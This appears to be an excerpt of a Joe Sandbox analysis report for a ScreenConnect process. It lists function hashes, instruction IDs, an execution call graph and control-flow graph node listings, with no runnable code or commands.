                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9488904ab36f2804ff3f481a0e4cb6806f975df6e0cd364c0a0d8d991cec6181
                                                                                                                                                                                                                                                          • Instruction ID: 28a837502216d00ee511d72f3a81371606ef2be5cfea2686f22deb24cb866404
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9488904ab36f2804ff3f481a0e4cb6806f975df6e0cd364c0a0d8d991cec6181
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF0A039A40300CFCB648B64AC186A87BAAFB91326B089079E82F9B614C7368C40CF54
                                                                                                                                                                                                                                                          Function 02EE12B0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0fbdb47c0fbd1318de3a124dbbdde723042aa267b4e11556b7248a26dfad2a14
                                                                                                                                                                                                                                                          • Instruction ID: 92f2abe23546432c4f9712c122950d7fd9355c94eb0da6dccd588ff939f20cf1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fbdb47c0fbd1318de3a124dbbdde723042aa267b4e11556b7248a26dfad2a14
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21F030313007149B8B11AA99EC1059F77DAEBC9970744813DD80AEB750DB78EC059BD5
                                                                                                                                                                                                                                                          Function 02EE6EF8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 58cf7287bf6f064da0030277cf6dd1ce8d52cf698030625fc653611cf5296da9
                                                                                                                                                                                                                                                          • Instruction ID: afde20fdd9b773ec0874ad83cd9057ee390d5db2095e8c0cffe37e971eea3b0a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58cf7287bf6f064da0030277cf6dd1ce8d52cf698030625fc653611cf5296da9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43E04F31704314979B145A9B788852EBADEFBC8A75754413EF60AC3340DE659C1983A5
                                                                                                                                                                                                                                                          Function 02EE1DA1 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2f01533a92262e5ed5676798e2aa4fe295846d855a2c2d9b6dcb45fcc5e7f342
                                                                                                                                                                                                                                                          • Instruction ID: 2d3a16b71ff4ad2896d8831be08f53831dbcffd40ec9a28c818a975600d2ce52
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f01533a92262e5ed5676798e2aa4fe295846d855a2c2d9b6dcb45fcc5e7f342
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E092363103545BC7549769EC0DA6E7BAEEBD5532F044126E906C33D4CE349C0187A4
                                                                                                                                                                                                                                                          Function 02EE5F78 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c0ce0a0846b9e89cd92c3491aa97838997742b357b428ec6da174c5d2a71b25c
                                                                                                                                                                                                                                                          • Instruction ID: 58bde0c550f4f9d22768f65b1ea04a029f337dc01af700df803c856464dddd8e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0ce0a0846b9e89cd92c3491aa97838997742b357b428ec6da174c5d2a71b25c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E08C32B414519B8F10819E9C45655B7CBCB892ADFBDD671F82ACB381FB21DC02C382
                                                                                                                                                                                                                                                          Function 02EE13D0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 269e2a267802e1f3b3f523a200711c22f75aa2cf5348fbd8a27e504e3083c6ba
                                                                                                                                                                                                                                                          • Instruction ID: acb96e8c1721d083c3080b5627ced2fbca4a7e8bb9edf4a69400665966062fea
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 269e2a267802e1f3b3f523a200711c22f75aa2cf5348fbd8a27e504e3083c6ba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAE0CD3210061917E765D618FC81BDF27D7FBE9230F040A7DF44197201DA65BD4947A9
                                                                                                                                                                                                                                                          Function 02EE1DF9 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5d22b4dd2d192981095261e87f97aa6d679879129dc01d06e2f991162f44e7fa
                                                                                                                                                                                                                                                          • Instruction ID: cee324ed2504dbb260c712715f2402294833c3f6be352eff19701e24ab2c3059
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d22b4dd2d192981095261e87f97aa6d679879129dc01d06e2f991162f44e7fa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE04F7151120DBFDB84DB64DC457AE77B9EB44214F504569E808D3250DE34AE049B95
                                                                                                                                                                                                                                                          Function 02EE1DB0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 376d34ac1924026be6c9054e66e591e89b71c76dde26df4c028d59dde0444733
                                                                                                                                                                                                                                                          • Instruction ID: f9794981e9ec1b390c98c083afc2c5fe208a6317f2664e01a980769963702e1e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 376d34ac1924026be6c9054e66e591e89b71c76dde26df4c028d59dde0444733
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6E04F363103145B8754A769AC0C45E7AAEEBC95717104126E906C3394CF308C1187A4
                                                                                                                                                                                                                                                          Function 02EE1310 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 54dd62fba66c905abb5369f26b4a34c573c3160f51bbd00cf536e63308b22623
                                                                                                                                                                                                                                                          • Instruction ID: 21e1c75e74dbff738393395fbcec48417e0ba2504efbc575e056411c242fea1e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54dd62fba66c905abb5369f26b4a34c573c3160f51bbd00cf536e63308b22623
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CE0E671D051086F8F80DFBCD85529DFBF4EB58650F5585A9C81DD7341E6329B028B91
                                                                                                                                                                                                                                                          Function 02EE7FB8 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d5e152d679d31362f79673f5b3e694ed2472801ec9d83eceaa04851cc5991b75
                                                                                                                                                                                                                                                          • Instruction ID: 49575c878cfde5d916695b9a8e344bd3830d598321b60b8c941bdbc10e0e4f90
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5e152d679d31362f79673f5b3e694ed2472801ec9d83eceaa04851cc5991b75
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1E04F31958215AFC340DF24ED06B8ABBE0EB45A00F49887DE84CC7241D231ED0A9B82
                                                                                                                                                                                                                                                          Function 02EE8120 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b32b6c726fbed23598d8ea105b14d310c5520c533dbeec6521b6bedbbcebbf12
                                                                                                                                                                                                                                                          • Instruction ID: 0495ea1ffb9495e33af8656dc35fcd26fa8b343337ef8bf9c08063d3a5593066
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b32b6c726fbed23598d8ea105b14d310c5520c533dbeec6521b6bedbbcebbf12
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68E04671424215EFC780EF28E949686FBF4EB04604F05886CEC89C3601E231A9468B42
                                                                                                                                                                                                                                                          Function 02EE0848 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 366697dfd1c97b950495658cafb4afedde1ad7fdd097e105a41756d6b7e79600
                                                                                                                                                                                                                                                          • Instruction ID: 2dce47164eedc24f3ce47785ebee27c063a31da463a874e60498fcf46179050e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 366697dfd1c97b950495658cafb4afedde1ad7fdd097e105a41756d6b7e79600
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFD01770A0120DFF8B50EFB5ED0159DB7B9FB44611B104AA8D808E7700EA316E009B95
                                                                                                                                                                                                                                                          Function 02EE1E08 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1828754401.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_2ee0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4fd6380ce60aa88024f1b61fee78c7cd7e9dac493cdf9b4cf8db535e4d5f0f05
                                                                                                                                                                                                                                                          • Instruction ID: 8e31032fa3d058039fb213cf77dd04d5c2753ee3b00690ba11708bcd6e85ed2d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fd6380ce60aa88024f1b61fee78c7cd7e9dac493cdf9b4cf8db535e4d5f0f05
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBD017B0A0120DEF9B44DFA4E94559EB7F9EB44220B1085A9E808E3650EA35AE049B95

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:8.7%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                          Total number of Nodes:206
                                                                                                                                                                                                                                                          Total number of Limit Nodes:13
                                                                                                                                                                                                                                                          execution_graph 37144 463d430 37145 463d443 37144->37145 37148 463ba10 37145->37148 37149 463d480 CreateFileA 37148->37149 37151 463d5b5 37149->37151 37152 3cf4128 37153 3cf414c 37152->37153 37154 3cf415c 37152->37154 37155 3cf4155 37153->37155 37158 3cf434b 2 API calls 37153->37158 37159 3cf4358 2 API calls 37153->37159 37160 3cf434b 37154->37160 37168 3cf4358 37154->37168 37158->37153 37159->37153 37161 3cf4358 37160->37161 37162 3cf437b 37161->37162 37176 15c6558 37161->37176 37190 15c6568 37161->37190 37163 3cf4384 37162->37163 37166 15c6558 2 API calls 37162->37166 37167 15c6568 2 API calls 37162->37167 37163->37153 37166->37162 37167->37162 37170 3cf437b 37168->37170 37171 3cf438b 37168->37171 37169 3cf4384 37169->37153 37170->37169 37174 15c6558 2 API calls 37170->37174 37175 15c6568 2 API calls 37170->37175 37172 15c6558 2 API calls 37171->37172 37173 15c6568 2 API calls 37171->37173 37172->37170 37173->37170 37174->37170 37175->37170 37177 15c659b 37176->37177 37179 15c658b 37176->37179 37177->37179 37180 15c6558 2 API calls 37177->37180 37181 15c6568 2 API calls 37177->37181 37204 15cd9b0 37177->37204 37214 15cd9a0 37177->37214 37224 15ca7b8 37177->37224 37229 3cf2ab0 37177->37229 37237 15ca7a8 37177->37237 37242 3cf2aa1 37177->37242 37178 15c6594 37178->37162 37179->37178 37188 3cf2aa1 2 API calls 37179->37188 37189 3cf2ab0 2 API calls 37179->37189 37180->37179 37181->37179 37188->37179 37189->37179 37191 15c659b 37190->37191 37193 15c658b 37190->37193 37191->37193 37196 15c6558 2 API calls 37191->37196 37197 15c6568 2 API calls 37191->37197 37198 15ca7b8 2 API calls 37191->37198 37199 15ca7a8 2 API calls 37191->37199 37200 15cd9b0 2 API calls 37191->37200 37201 15cd9a0 2 API calls 37191->37201 37202 3cf2aa1 2 API calls 37191->37202 37203 3cf2ab0 2 API calls 37191->37203 37192 15c6594 37192->37162 37193->37192 37194 3cf2aa1 2 API calls 37193->37194 37195 3cf2ab0 2 API calls 37193->37195 37194->37193 37195->37193 37196->37193 37197->37193 37198->37193 37199->37193 37200->37193 37201->37193 37202->37193 37203->37193 37205 15cd9d3 37204->37205 37207 15cd9e3 37204->37207 37206 15cd9dc 37205->37206 37210 15c6558 2 API calls 37205->37210 37211 15c6568 2 API calls 37205->37211 37212 15cd9b0 2 API calls 37205->37212 37213 15cd9a0 2 API calls 37205->37213 37206->37179 37208 15c6558 2 API calls 37207->37208 37209 15c6568 2 API calls 37207->37209 37208->37206 37209->37206 37210->37206 37211->37206 37212->37206 37213->37206 37215 15cd9d3 37214->37215 37216 15cd9e3 37214->37216 37217 15cd9dc 37215->37217 37220 15c6558 2 API calls 37215->37220 37221 15c6568 2 API calls 37215->37221 37222 15cd9b0 2 API calls 37215->37222 37223 15cd9a0 2 API calls 37215->37223 37218 15c6558 2 API calls 37216->37218 37219 15c6568 2 API calls 37216->37219 37217->37179 37218->37217 37219->37217 37220->37217 37221->37217 37222->37217 37223->37217 37225 15ca7e9 37224->37225 37226 15ca7dd 37224->37226 37225->37226 37227 3cf2aa1 2 API calls 37225->37227 37228 3cf2ab0 2 API calls 37225->37228 37226->37179 37227->37226 37228->37226 37230 3cf2ae4 37229->37230 37232 3cf2ad4 37229->37232 37235 15c6558 2 API calls 37230->37235 37236 15c6568 2 API calls 37230->37236 37231 3cf2add 37231->37179 37232->37231 37250 3cf4500 37232->37250 37254 3cf44f0 37232->37254 37235->37232 37236->37232 37238 15ca7b8 37237->37238 37239 15ca7dd 37238->37239 37240 3cf2aa1 2 API calls 37238->37240 37241 3cf2ab0 2 API calls 37238->37241 37239->37179 37240->37239 37241->37239 37244 3cf2aad 37242->37244 37243 3cf2add 37243->37179 37245 3cf2ad4 37244->37245 37248 15c6558 2 API calls 37244->37248 37249 15c6568 2 API calls 37244->37249 37245->37243 37246 3cf4500 2 API calls 37245->37246 37247 3cf44f0 2 API calls 37245->37247 37246->37243 37247->37243 37248->37245 37249->37245 37251 3cf4530 37250->37251 37252 3cf454b 37251->37252 37258 15ce2a2 37251->37258 37252->37231 37255 3cf4530 37254->37255 37256 3cf454b 37255->37256 37257 15ce2a2 2 API calls 37255->37257 37256->37231 37257->37256 37259 15ce2b5 37258->37259 37260 15ce2d2 37259->37260 37263 3cf4650 37259->37263 37268 3cf4660 37259->37268 37260->37252 37265 3cf4686 37263->37265 37264 3cf46fb 37264->37260 37265->37264 37273 3cf4798 37265->37273 37278 3cf4958 37265->37278 37270 3cf4686 37268->37270 37269 3cf46fb 37269->37260 37270->37269 37271 3cf4798 2 API calls 37270->37271 37272 3cf4958 2 API calls 37270->37272 37271->37269 37272->37269 37275 3cf47c8 37273->37275 37274 3cf47f5 37274->37264 37275->37274 37283 3cf4f8b 37275->37283 37287 3cf4fc0 37275->37287 37280 3cf496a 37278->37280 37279 3cf49dd 37279->37264 37280->37279 37281 3cf4f8b 2 API calls 37280->37281 37282 3cf4fc0 2 API calls 37280->37282 37281->37279 37282->37279 37284 3cf4fd5 37283->37284 37286 3cf5021 2 API calls 37284->37286 37285 3cf5016 37285->37274 37286->37285 37288 3cf4fd5 37287->37288 37290 3cf5021 2 API calls 37288->37290 37289 3cf5016 37289->37274 37290->37289 37075 5881440 37078 5881469 37075->37078 37079 5881489 37078->37079 37082 3cf5021 37079->37082 37080 588144e 37087 3cf5050 37082->37087 37088 58814b8 37082->37088 37092 5881418 37082->37092 37098 5881408 37082->37098 37104 58814c8 37082->37104 37087->37080 37089 58814c4 37088->37089 37089->37089 37107 58815f0 37089->37107 37093 5881422 37092->37093 37094 5881424 37092->37094 37093->37087 37119 5883d08 37094->37119 37123 5883cf8 37094->37123 37095 588142a 37095->37087 37099 5881422 37098->37099 37100 5881424 37098->37100 37099->37087 37102 5883d08 2 API calls 37100->37102 37103 5883cf8 2 API calls 37100->37103 37101 588142a 37101->37087 37102->37101 37103->37101 37105 58814e9 37104->37105 37106 58815f0 2 API calls 37104->37106 37105->37105 37106->37105 37111 5881680 37107->37111 37115 5881676 37107->37115 37112 58816db OpenSCManagerA 37111->37112 37114 58817c3 37112->37114 37116 5881680 OpenSCManagerA 37115->37116 37118 58817c3 37116->37118 37120 5883d17 37119->37120 37127 58813c0 37120->37127 37124 5883d17 37123->37124 37125 58813c0 2 API calls 37124->37125 37126 5883d1e 37125->37126 37126->37095 37128 58813d1 37127->37128 37130 3cf5021 2 API calls 37128->37130 37129 58813fe 37129->37095 37130->37129 37291 15c36b0 37294 15c36c6 37291->37294 37292 15c3764 37293 15c3739 37294->37292 37296 15cc6d0 37294->37296 37297 15cc6d5 37296->37297 37298 15cc746 37297->37298 37301 15ccbc0 37297->37301 37305 15ccbb0 37297->37305 37298->37293 37303 15ccbe6 37301->37303 37302 15ccc1e 37302->37298 37303->37302 37309 15cd069 37303->37309 37306 15ccbc0 37305->37306 37307 15ccc1e 37306->37307 37308 15cd069 2 API calls 37306->37308 37307->37298 37308->37307 37310 15cd0a6 37309->37310 37314 15cd7f8 37310->37314 37319 15cd808 37310->37319 37311 15cd2ce 37316 15cd82c 37314->37316 37315 15cd87b 37315->37311 37316->37315 37317 15c6558 2 API calls 37316->37317 37318 15c6568 2 API calls 37316->37318 37317->37315 37318->37315 37321 15cd82c 37319->37321 37320 15cd87b 37320->37311 37321->37320 37322 15c6558 2 API calls 37321->37322 37323 15c6568 2 API calls 37321->37323 37322->37320 37323->37320 37324 15c7920 37325 15c794a 37324->37325 37326 15c7965 37325->37326 37327 15c6558 2 API calls 37325->37327 37328 15c6568 2 API calls 37325->37328 37327->37326 37328->37326 37131 3cf2ec0 37132 3cf2edc 37131->37132 37133 3cf2efa 37131->37133 37132->37133 37136 3cf33bf 37132->37136 37140 3cf33d0 37132->37140 37137 3cf33ce 37136->37137 37138 3cf355c 37137->37138 37139 3cf5021 2 API calls 37137->37139 37139->37137 37141 3cf33ef 37140->37141 37142 3cf355c 37141->37142 37143 3cf5021 2 API calls 37141->37143 37143->37141

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 03CF33BF Relevance: 2.8, Strings: 2, Instructions: 273COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 3cf33bf-3cf33cc 1 3cf33ce-3cf3418 0->1 2 3cf341d 0->2 10 3cf3452-3cf3481 1->10 14 3cf341a 1->14 3 3cf3424-3cf342e 2->3 5 3cf3437-3cf3447 3->5 6 3cf3430 3->6 5->10 6->5 18 3cf34c4-3cf34eb call 3cf28e0 10->18 19 3cf3483-3cf3499 10->19 14->3 81 3cf34ee call 3cf3851 18->81 82 3cf34ee call 3cf3860 18->82 23 3cf349b 19->23 24 3cf34a2-3cf34c2 19->24 23->24 24->18 29 3cf34f0-3cf3501 30 3cf355c-3cf356b 29->30 31 3cf3503-3cf351d 29->31 32 3cf356d-3cf3581 30->32 33 3cf35b0-3cf35d7 30->33 41 3cf374e 31->41 42 3cf3523-3cf354d call 3cf5021 31->42 37 3cf358a-3cf35ae 32->37 38 3cf3583 32->38 43 3cf35d9-3cf360f 33->43 44 3cf3612-3cf3636 33->44 37->33 38->37 46 3cf3753-3cf3764 41->46 62 3cf3553-3cf355a 42->62 43->44 53 3cf3638-3cf366f 44->53 54 3cf3671-3cf36b7 44->54 64 3cf3765 46->64 53->54 68 3cf36bd-3cf36d7 54->68 69 3cf3739-3cf374c 54->69 62->30 62->31 64->64 68->41 72 3cf36d9-3cf370a 68->72 69->46 77 3cf370c-3cf3728 72->77 78 3cf3730-3cf3737 72->78 77->78 78->68 78->69 81->29 82->29
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ;#$k!
                                                                                                                                                                                                                                                          • API String ID: 0-1260452682
                                                                                                                                                                                                                                                          • Opcode ID: 9d6cd41d1215df5c97bf64b282abd1c49e1472a01514649a220781a697050048
                                                                                                                                                                                                                                                          • Instruction ID: 4b23d1f2f41b911a4e621d81c5a055177fef2d2bb76daaf9bd380a0c8e132d35
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d6cd41d1215df5c97bf64b282abd1c49e1472a01514649a220781a697050048
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0B19E35A00605AFCB45EF68D981A9EBBF2EF85624B15C869D405EF311DF30ED068F91
                                                                                                                                                                                                                                                          Function 03CF33D0 Relevance: 2.8, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 84 3cf33d0-3cf3418 89 3cf341a-3cf342e 84->89 90 3cf3452-3cf3481 84->90 93 3cf3437-3cf3447 89->93 94 3cf3430 89->94 99 3cf34c4-3cf34eb call 3cf28e0 90->99 100 3cf3483-3cf3499 90->100 93->90 94->93 163 3cf34ee call 3cf3851 99->163 164 3cf34ee call 3cf3860 99->164 104 3cf349b 100->104 105 3cf34a2-3cf34c2 100->105 104->105 105->99 110 3cf34f0-3cf3501 111 3cf355c-3cf356b 110->111 112 3cf3503-3cf351d 110->112 113 3cf356d-3cf3581 111->113 114 3cf35b0-3cf35d7 111->114 122 3cf374e 112->122 123 3cf3523-3cf354d call 3cf5021 112->123 118 3cf358a-3cf35ae 113->118 119 3cf3583 113->119 124 3cf35d9-3cf360f 114->124 125 3cf3612-3cf3636 114->125 118->114 119->118 127 3cf3753-3cf3764 122->127 143 3cf3553-3cf355a 123->143 124->125 134 3cf3638-3cf366f 125->134 135 3cf3671-3cf36b7 125->135 145 3cf3765 127->145 134->135 149 3cf36bd-3cf36d7 135->149 150 3cf3739-3cf374c 135->150 143->111 143->112 145->145 149->122 153 3cf36d9-3cf370a 149->153 150->127 158 3cf370c-3cf3728 153->158 159 3cf3730-3cf3737 153->159 158->159 159->149 159->150 163->110 164->110
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ;#$k!
                                                                                                                                                                                                                                                          • API String ID: 0-1260452682
                                                                                                                                                                                                                                                          • Opcode ID: 34399d592e59cf4862e96fedd7110e841584acb1fb566f36afa0ad227076a987
